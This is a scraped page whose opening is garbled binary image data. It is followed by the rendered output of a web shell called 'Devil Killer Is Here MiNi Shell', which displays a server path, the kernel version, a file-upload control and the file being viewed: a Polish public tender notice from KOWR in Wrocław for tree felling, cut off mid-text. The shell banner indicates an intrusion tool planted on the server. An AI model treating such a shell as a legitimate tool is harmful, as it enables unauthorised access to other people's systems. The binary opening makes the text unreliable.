JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211214/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20211214/0031489101-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługi polegające na wycince, cięciach pielęgnacyjnych i sadzeniu<br/>drzew WRO.WOP.260.46.2021 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Krajowy Ośrodek Wsparcia Rolnictwa</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Oddział Terenowy we Wrocławiu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 367849538</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Mińska 60</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wrocław</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">54-610</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL514 - Miasto Wrocław</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne.wroclaw@kowr.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.kowr.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - agencja wykonawcza</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> wykonywanie prawa własności do nieruchomości Skarbu Państwa </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługi polegające na wycince, cięciach pielęgnacyjnych i sadzeniu<br/>drzew WRO.WOP.260.46.2021 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c6e83f68-582b-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00314891</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00011827/18/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.12 Cięcia pielęgnacyjne, wycinka drzewostanu, nasadzenia, usługi w zakresie gospodarki leśnej na gruntach będących lasami i usług związanych z drzewostanem na gruntach niebędących lasami z ZWRSP</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://kowr.eb2b.com.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja odbywa się w formie<br/>elektronicznej, za pośrednictwem Platformy Zakupowej – pod adresem: https://kowr.eb2b.com.pl<br/>Zapytania kierowane na adresy mailowe nie będą rozpatrywane. Korzystanie z Platformy wymaga<br/>zarejestrowania konta na Platformie. Instrukcja korzystania z Platformy Zakupowej dostępna jest w<br/>zakładce „Pomoc/Instrukcje”. W zakładce „Załączniki” przedmiotowego postepowania Zamawiający<br/>zamieszcza dokumentację postępowania. Zakładka „Załączniki” służy również Wykonawcom do<br/>złożenia oferty oraz dokumentów lub oświadczeń składanych razem z ofertą. Korespondencja<br/>elektroniczna inna niż oferta Wykonawcy i załączniki do oferty, odbywa się elektronicznie za<br/>pośrednictwem Platformy w zakładce „Pytania/Informacje”. Zamawiający nie przewiduje sposobu<br/>komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej<br/>wskazanych w SWZ. Szczegółowe informacje zawarto w ust. 7 SWZ</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Przy rejestracji Wykonawca przechodzi do Formularza rejestracyjnego poprzez zakładkę „LOGOWANIE” oraz<br/>opcję„ZAREJESTRUJ SIĘ”. Po wypełnieniu formularza rejestracyjnego Wykonawca otrzymuje e-maila<br/>informującego,że może dokonać pierwszego logowania do Platformy.2. Minimalne<br/>wymaganiatechniczne i organizacyjne korzystania z Platformy określa Regulamin Platformy Zakupowej<br/>(dostępnypod adresem https://platforma.eb2b.com.pl/user/terms).3. Instrukcja korzystania z<br/>PlatformyZakupowej dostępna jest w zakładce „Pomoc/Instrukcje”.4. Wykonawca przystępując do<br/>postępowaniao udzielenie zamówienia publicznego, akceptuje wa-runki korzystania z platformy,<br/>określone winstrukcji korzystania z platformy oraz w regulaminie platformy. Wykonawca korzystając z<br/>platformyzobowiązuje się do przestrzegania postanowień za-wartych w ww. instrukcji oraz w<br/>regulaminieplatformy.5. System umożliwia dodanie plików o wielkości do 50 MB. Zamawiający dopuszcza wszczegól-ności pliki w formatach: .doc, .docx, .xls, .xlsx, .pdf, .jpg, .zip, .rar.6.<br/>Korespondencjaelektroniczna inna niż oferta Wykonawcy i załączniki do oferty, odbywa się<br/>elektronicznie zapośrednictwem Platformy w zakładce „Pytania/Informacje”.7. Za datę wpływu oferty,<br/>oświadczenia, októrym mowa w art. 125 ust 1 ustawy PZP, podmiotowych środków dowodowych, w<br/>tym oświadczenia,o którym mowa w art. 117 ust. 4 ustawy PZP, zobowiązania podmiotu<br/>udostępniającego zasoby,przedmiotowych środków dowodowych, pełno-mocnictw, oraz innych<br/>informacji, dokumentów ioświadczeń przyjmuje się datę ich wczytywania do systemu (przesłania na<br/>Platformę).8 Plik ofertyzałączony przez Wykonawcę na Platformie i zapisany, widoczny jest w systemie<br/>jako zaszyfrowany.Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez<br/>Zamawia-jącego po upływieterminu składania ofert.10. Zamawiający określa następujące niezbędne<br/>wymagania sprzętowo -aplikacyjne umożliwiają-ce pracę na Platformie: 1) stały dostęp do sieci Internet<br/>o gwarantowanej przepustowości nie mniejszej niż 2 mb/s; 2) komputer klasy PC lub PC lub MAC, o<br/>następującejkonfiguracji: pamięć min. 4GB Ram, proce-sor Intel IV 4GHZ, jeden z systemów<br/>operacyjnych - MSWindows 7, Mac Os x 10.4, Linux lub ich nowsze wersje; 3) zainstalowana dowolna<br/>najnowsza wersja przeglądarki internetowej; w przypadku Internet Explorer minimalnie wersja 11.0; 4)<br/>włączona obsługaJavaScript; 5) zainstalowany program Acrobat Reader. 11. Sposób sporządzenia<br/>dokumentówelektronicznych, oświadczeń lub elektronicznych kopii do-kumentów lub oświadczeń musi<br/>być zgodny zwymaganiami określonymi w Rozporządzeniach, o których mowa w ust. 2 SWZ. 12.<br/>Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy<br/>użyciu środków komunikacji elektronicznej wskazanej w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej jako „RODO”, wszystkie osoby, które ubiegają się o udzielenie zamówienia/<br/>złożyły ofertę. Zamawiający informuje, że: 1. Administrator danych osobowychAdministratorem, czyli<br/>podmiotem decydującym o celach i środkach przetwarzania Pani/Pana danych osobowych, jest<br/>Krajowy Ośrodek Wsparcia Rolnictwa (zwany dalej KOWR) z siedzibą w Warszawie (01-207) przy ul.<br/>Karolkowej 30. Z administratorem może się Pani/Pan skontaktować poprzez adres e-mail:<br/>kontakt@kowr.gov.pl lub pisemnie na adres korespondencyjny: Krajowy Ośrodek Wsparcia Rolnictwa,<br/>ul. Karolkowa 30, 01-207 Warszawa. 2. Inspektor Ochrony Danych OsobowychW KOWR wyznaczono<br/>Inspektora Ochrony Danych Osobowych, z którym może się Pani/Pan skontaktować w sprawach<br/>ochrony i przetwarzania swoich danych osobowych pod adresem e-mail: iodo@kowr.gov.pl lub<br/>pisemnie na adres naszej siedziby, wskazany w ust. 1.3. Cele i podstawy prawne przetwarzania<br/>danych osobowychPani/Pana dane osobowe przetwarzane będą w celach związanym z<br/>postępowaniem o udzielenie zamówienia publicznego prowadzonym na podstawie ustawy z dnia 11<br/>września 2019 r. Prawo zamówień publicznych – Dz.U. z 2019 r. poz. 2019 z póżn. zm. (dalej PZP), w<br/>celach związanych z realizacją obowiązków administratora jako Zamawiającego, które wynikają z<br/>obowiązujących przepisów prawa. Pani/Pana dane osobowe przetwarzane będą także w celu realizacji<br/>obowiązku prowadzenia ewidencji korespondencji i archiwizacji dokumentacji zgodnie z ustawą z dnia<br/>14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach (Dz. U. z 2020 r. poz. 164 z późn.<br/>zm.).4. Odbiorcy danych osobowychPani/Pana dane pozyskane w związku z postępowaniem o<br/>udzielenie zamówienia publicznego przekazywane będą wszystkim zainteresowanym podmiotom i<br/>osobom, gdyż co do zasady postępowanie o udzielenie zamówienia publicznego jest<br/>jawne.Ograniczenie dostępu do Pani/Pana danych, o których mowa wyżej może wystąpić jedynie w<br/>szczególnych przypadkach, jeśli jest to uzasadnione ochroną prywatności, zgodnie z art. 18 ust 5 pkt 1<br/>i 2 PZP.Pani/Pana dane osobowe mogą być udostępniane innym osobom lub podmiotom jeżeli obowiązek taki będzie wynikać z przepisów prawa. Do Pani/Pana danych mogą też mieć dostęp<br/>podmioty przetwarzające dane w naszym imieniu, np. podmioty świadczące pomoc prawną, usługi<br/>informatyczne, usługi niszczenia dokumentów, jak również inni administratorzy danych osobowych<br/>przetwarzający dane we własnym imieniu, np. podmioty prowadzące działalność pocztową lub<br/>kurierską.5. Okres przetwarzania danych osobowych Pani/Pana dane osobowe będą przetwarzane<br/>przez okres przewidziany przepisami prawa w tym zakresie, w tym przez okres przechowywania<br/>dokumentacji określony w przepisach powszechnych i uregulowaniach wewnętrznych KOWR w<br/>zakresie archiwizacji dokumentów, okres przedawnienia roszczeń przysługujących KOWR i w stosunku<br/>do niego.Dokumentacja dotycząca postępowania o udzielenie zamówienia publicznego będzie<br/>przechowywana, zgodnie z art. 78 ust. 1 PZP, przez okres 4 lat od dnia zakończenia postępowania o<br/>udzielenie zamówienia, licząc od dnia 1 stycznia roku następnego po dniu zakończenia postępowania,<br/>a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania<br/>umowy. ciąg dalszy w kolejnej w polu RODO (ograniczenia stosowania)</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">ciąg dalszy pola RODO (obowiązek informacyjny)6.<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie<br/>podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>Informacja o wymogu/dobrowolności podania danych osobowychPodanie Pani/Pana danych<br/>osobowych w związku z udziałem w postępowaniu o udzielenie zamówienia ma charakter dobrowolny,<br/>ale jest niezbędne do wzięcia w nim udziału. 7. Prawa osób, których dane dotycząZgodnie z RODO<br/>przysługuje Pani/Panu:1) prawo dostępu do swoich danych oraz otrzymania ich kopii; 2) prawo do<br/>sprostowania (poprawiania) swoich danych; 3) prawo do usunięcia danych osobowych, w sytuacji, gdy<br/>przetwarzanie danych nie następuje w celu wywiązania się z obowiązku wynikającego z przepisu<br/>prawa lub w ramach sprawowania wła-dzy publicznej; 4) prawo do ograniczenia przetwarzania danych,<br/>przy czym przepisy odrębne mogą wyłączyć moż-liwość skorzystania z tego prawa.Jeżeli chce<br/>Pani/Pan skorzystać z któregokolwiek z tych uprawnień, prosimy o kontakt z Inspektorem Ochrony<br/>Danych Osobowych, wskazany w pkt 2 lub pisemnie na adres korespondencyjny, wskazany w pkt<br/>1.Zgodnie z RODO, każdej osobie, której dane są przetwarzane przysługuje prawo do wniesienia<br/>skargi do Prezesa Urzędu Ochrony Danych Osobowych. 8. Zautomatyzowane podejmowanie decyzjiW<br/>oparciu o Pani/Pana dane osobowe administrator nie będzie podejmował wobec Pani/Pana<br/>zautomatyzowanych decyzji, w tym decyzji będących wynikiem profilowania. 9. Przekazywanie danych<br/>poza Europejski Obszar GospodarczyW związku z jawnością postępowania o udzielenie zamówienia<br/>publicznego Pani/Pana dane mogą być przekazywane do państw trzecich (tj. państwa, które nie należy<br/>do Europejskiego Obszaru Gospodarczego obejmującego Unię Europejską, Norwegię, Liechtenstein i<br/>Islandię), z zastrzeżeniem, o którym mowa w punkcie 4</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WRO.WOP.260.46.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 294273,65 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 54889,23 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">7</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dz. nr 237/65 obręb Kątna, gm. Długołęka: usunięcie 1 szt. drzewa: Robinia akacjowa, obwód<br/>na wys. 1,3 m = 135 cm- na podstawie załączonej decyzji<br/>Przedmiotowe drzewo rośnie na skarpie rowu, w bezpośrednim sąsiedztwie budynku<br/>mieszkalnego w miejscowości Kątna. Robinia jest obumarła w 100%.<br/>Bezpośrednio przed planowanym wycięciem należy dokonać oglądu drzewa, celem stwierdzenia<br/>czy nie zostało w międzyczasie zasiedlone przez gatunki chronione grzybów, roślin lub zwierząt.<br/>Po wyko-naniu prac należy uporządkować teren wycinki<br/>W zakresie usunięcia i zabiegów pielęgnacyjnych drzew Wykonawca zobowiązany jest do:<br/>1. wyrobienia drewna, pocięcia i złożenia w stosy – maksymalna dopuszczalna długość wyrzynków<br/>i wałków drewna wynosi 2,4m,<br/>2. uprzątnięcia i utylizacji resztek po wyciętych drzewach oraz innych odpadów powstałych w<br/>wyniku przeprowadzonych prac, zgodnie z właściwymi przepisami powszechnie obowiązującymi<br/>(dopuszcza się pozostawienie odpadów powycinkowych w miejscu prac, w postaci zręb-ki<br/>równomiernie rozrzuconej na terenie),<br/>3. uporządkowania terenu po wycince drzew, wywiezienie gałęzi i konarów - zakazuje się rozpalania<br/>ognisk celem utylizacji odpadów powycinkowych,<br/>4. zakupu i wywiezienia pozyskanego drewna,<br/>5. wykonania wiązań na drzewach o parametrach nie gorszych niż np. Cobra, Boa itp.<br/>(parametry potwierdzone odpowiednimi dokumentami) oraz montaż zgodny ze sztuką i wiedzą<br/>arbory-styczną.<br/>Pozostałe warunki realizacji zamówienia zawarte są w decyzjach administracyjnych oraz w<br/>projektowanych postanowieniach umowy, które zostaną wprowadzone do treści umowy<br/>stanowiących załączniki nr 7 i 8 do SWZ. Złożenie oferty jest jednoznaczne z akceptacją<br/>projektowanych postanowień umowy, które zostaną wprowadzone do treści umowy. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 968,73 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77211400-6 - Usługi wycinania drzew</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający będzie oceniał oferty według następujących<br/>kryteriów:1.Kryterium „Cena brutto za przedmiot zamówienia” (Kc) – waga 60 % 2. Kryterium „Termin<br/>wykonaniaprzedmiotu zamówienia” (Kt) – waga 40 % Sposób przyznania punktów opisano w ust. 19<br/>SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji przedmiotu zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dz. nr 125 obręb Wisznia Mała, gm. Wisznia Mała: Usunięcie 1 szt. drzewa: Kasztanowiec<br/>zwyczajny, obwód na wys. 1,3 m = 288 cm – na podstawie załączonej decyzji<br/>Drzewo jest w złym stanie fitosanitarnym, posiada odsłonięty system korzeniowy, dodatkowo jest<br/>mocno odchylone od pionu. Bezpośrednio przed planowanym wycięciem należy dokonać oglądu<br/>drzewa, celem stwierdzenia czy nie zostało w międzyczasie zasiedlone przez gatunki chronione<br/>grzybów, roślin lub zwierząt. Po wykonaniu prac należy uporządkować teren wycinki.<br/>W zakresie usunięcia i zabiegów pielęgnacyjnych drzew Wykonawca zobowiązany jest do:<br/>1. wyrobienia drewna, pocięcia i złożenia w stosy – maksymalna dopuszczalna długość wyrzynków<br/>i wałków drewna wynosi 2,4m,<br/>2. uprzątnięcia i utylizacji resztek po wyciętych drzewach oraz innych odpadów powstałych w<br/>wyniku przeprowadzonych prac, zgodnie z właściwymi przepisami powszechnie obowiązującymi<br/>(dopuszcza się pozostawienie odpadów powycinkowych w miejscu prac, w postaci zręb-ki<br/>równomiernie rozrzuconej na terenie),<br/>3. uporządkowania terenu po wycince drzew, wywiezienie gałęzi i konarów - zakazuje się rozpalania<br/>ognisk celem utylizacji odpadów powycinkowych,<br/>4. zakupu i wywiezienia pozyskanego drewna,<br/>5. wykonania wiązań na drzewach o parametrach nie gorszych niż np. Cobra, Boa itp.<br/>(parametry potwierdzone odpowiednimi dokumentami) oraz montaż zgodny ze sztuką i wiedzą<br/>arbory-styczną.<br/>Pozostałe warunki realizacji zamówienia zawarte są w decyzjach administracyjnych oraz w<br/>projektowanych postanowieniach umowy, które zostaną wprowadzone do treści umowy<br/>stanowiących załączniki nr 7 i 8 do SWZ. Złożenie oferty jest jednoznaczne z akceptacją<br/>projektowanych postanowień umowy, które zostaną wprowadzone do treści umowy. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 968,73 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77211400-6 - Usługi wycinania drzew</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający będzie oceniał oferty według następujących<br/>kryteriów:1.Kryterium „Cena brutto za przedmiot zamówienia” (Kc) – waga 